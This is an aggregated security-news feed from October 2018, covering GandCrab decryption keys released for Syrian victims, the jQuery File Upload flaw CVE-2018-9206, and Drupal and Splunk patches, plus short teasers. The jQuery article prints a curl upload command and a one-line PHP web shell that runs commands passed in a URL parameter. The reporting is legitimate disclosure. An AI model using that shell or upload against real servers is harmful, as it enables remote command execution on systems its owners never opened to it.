Syrian victims of the GandCrab ransomware can decrypt their files for free

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

gandcrab ransomware post underground

Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

The GandCrab developers explained that it was not their intention to infect Syrian users, their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files.  The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims that are not included in the file could receive the decryption keys by providing the GandCrab developers a picture of themselves, their passport, and their payment page. Providing crooks pictures of their passport is very risky, this kind of documents could be resold by the crooks or used by them for identity thefts.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.

Pierluigi Paganini

(Security Affairs – GandCrab ransomware, cybercrime)

The post Syrian victims of the GandCrab ransomware can decrypt their files for free appeared first on Security Affairs.

testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws

testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws

testssl.sh is a free command line tool to test SSL security, it checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more.

testssl.sh is pretty much portable/compatible. It is working on every Linux, Mac OS X, FreeBSD distribution, on MSYS2/Cygwin (slow). It is supposed also to work on any other unixoid systems. A newer OpenSSL version (1.0) is recommended though.

Read the rest of testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws now! Only available at Darknet.

Thousands of applications affected by a zero-day issue in jQuery File Upload plugin

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.

Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by the Akamai researcher Larry Cashdollar, he explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

The files were uploaded to the files/ directory in the root path of the webserver, so the expert wrote a command line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F “files=@shell.php” http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET[‘cmd’]; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process.   I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable.  There are a few Youtube videos demonstrating the attack for similar software packages.” wrote the expert

Evert project that leverages the plugin is potentially affected, the researcher pointed out that there are a few Youtube PoC videos demonstrating the exploitation of the attack for similar software packages.

Cashdollar also published a proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

In order to address these changes and correct the file upload vulnerability in CVE-2018-9206 in Blueimp, the developer only allows file uploads to be of a content-type image.

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure.  If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well.  In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it.  The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”

Pierluigi Paganini

(Security Affairs – CVE-2018-9206, jQuery File Upload plugin )

The post Thousands of applications affected by a zero-day issue in jQuery File Upload plugin appeared first on Security Affairs.

10 Proven Security Awareness Tips to Implement Now



The post 10 Proven Security Awareness Tips to Implement Now appeared first on InfoSec Resources.


10 Proven Security Awareness Tips to Implement Now was first posted on October 19, 2018 at 2:52 pm.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Drupal dev team fixed Remote Code Execution flaws in the popular CMS

The Drupal development team has patched several vulnerabilities in version 7 and 8 of the popular CMS, including RCE flaws.

The development team of the Drupal content management system addressed several vulnerabilities in version 7 and 8, including some flaws that could be exploited for remote code execution.

Drupal team fixed a critical vulnerability that resides in the Contextual Links module, that fails to properly validate requested contextual links. The flaw could be exploited by an attacker with an account with the “access contextual links” permission for a remote code execution,

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating, they include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

Drupal team urges users to install security updates as soon as possible, there is the concrete risk that threat actors in the wild will start to exploit flaw in massive hacking campaigns.

Pierluigi Paganini

(Security Affairs – Drupal, hacking)

The post Drupal dev team fixed Remote Code Execution flaws in the popular CMS appeared first on Security Affairs.

Critical Flaw Found in Streaming Library Used by VLC and Other Media Players

Security researchers have discovered a serious code execution vulnerability in the LIVE555 Streaming Media library—which is being used by popular media players including VLC and MPlayer, along with a number of embedded devices capable of streaming media. LIVE555 streaming media, developed and maintained by Live Networks, is a set of C++ libraries companies and application developers use to

8 Popular Courses to Learn Ethical Hacking – 2018 Bundle

Update (Oct 2018) — Over 30,000 students from all around the world have joined this training program so far. Due to the growing number of threats in the computer world, ethical hackers have become the most important player for not only governments but also private companies and IT firms in order to safeguard their systems and networks from hackers trying to infiltrate them. By 2020,

Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast

On this episode of the CyberSpeak with InfoSec Institute podcast, Michel Huffaker, director of threat intelligence at ThreatQuotient, talks about cybersecurity issues facing the armed services, recent issues in the news and her thoughts on sensationalized security reporting. In the podcast, Huffaker and host Chris Sienko discuss:  What are some of the biggest security issues […]

The post Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast appeared first on InfoSec Resources.


Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast was first posted on October 19, 2018 at 8:08 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Splunk addressed several vulnerabilities in Enterprise and Light products

Splunk recently addressed several vulnerabilities in Enterprise and Light products, some of them have been rated “high severity.”

Splunk Enterprise solution allows organizations to aggregate, search, analyze, and visualize data from various sources that are critical to business operations.

The Splunk Light is a comprehensive solution for small IT environments that automates log analysis and integrate server and network monitoring.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” reads the advisory published by Splunk.

The most severe issue fixed by the company is a high severity cross-site scripting (XSS) flaw in the Web interface, tracked as CVE-2018-7427, that received the CVSS score of 8.1.

Another severe vulnerability is a DoS flaw tracked as CVE-2018-7432 that could be exploited using malicious HTTP requests sent to Splunkd that is the system process that handles indexing, searching and forwarding. This issue was tracked as “medium severity” by the company.

The company also addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-7429, that could be exploited by an attacker by sending a specially crafted HTTP request to Splunkd.

The last flaw addressed by the vendor, tracked as CVE-2018-7431, is a path traversal issue that allows an authenticated attacker to download arbitrary files from the vendor Django app. The vulnerability has been rated “medium severity.”

Below the affected versions:

  • Cross Site Scripting in Splunk Web (CVE-2018-7427)
  • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
  • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Denial of Service (CVE-2018-7432)
  • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.6.0
  • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Path Traversal Vulnerability in Splunk Django App (CVE-2018-7431)
  • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
  • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Splunkd Denial of Service via Malformed HTTP Request (CVE-2018-7429)
  • Affected Product Versions: Splunk Enterprise versions 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14 and Splunk Light before 6.5.0
  • Affected Components: All Splunk Enterprise components running Splunk Web.

The vendor declared it has found no evidence that these vulnerabilities have been exploited in attacks in the wild.

Pierluigi Paganini

(Security Affairs – XSS, hacking)

The post Splunk addressed several vulnerabilities in Enterprise and Light products appeared first on Security Affairs.

Critical Flaws Found in Amazon FreeRTOS IoT Operating System

A security researcher has discovered several critical vulnerabilities in one of the most popular embedded real-time operating systems—called FreeRTOS—and its other variants, exposing a wide range of IoT devices and critical infrastructure systems to hackers. What is FreeRTOS (Amazon, WHIS OpenRTOS, SafeRTOS)? FreeRTOS is a leading open source real-time operating system (RTOS) for embedded